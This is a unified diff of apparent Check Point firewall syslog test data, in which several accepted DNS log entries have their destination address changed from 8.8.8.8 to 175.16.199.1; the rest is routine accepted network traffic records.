-<134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:44:57Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116d9,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36444"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:44:58Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116da,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42557"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"194.29.39.27"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52096"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10579"; xlatesrc:"0.0.0.0"]
@@ -5784,7 +5784,7 @@
 <134>1 2020-03-29T21:45:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e1,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38356"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10581"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T21:45:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51966"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T21:45:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51967"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585518307"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43289"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e8116e3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585518307"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43289"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50776"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45531"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T21:45:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8116e3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51752"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10582"; xlatesrc:"0.0.0.0"]
@@ -6135,14 +6135,14 @@
 <134>1 2020-03-29T22:19:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ef1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52103"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:19:29Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811ef1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52104"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57905"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:19:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811ef6,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45684"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53358"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"44174"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10661"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37133"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:19:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39414"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10662"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:19:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40083"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:19:40Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811efb,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"47116"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10663"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811f00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585520384"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e811f00,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520384"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59903"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36569"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:19:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e811f00,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52810"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10664"; xlatesrc:"0.0.0.0"]
@@ -6177,48 +6177,48 @@
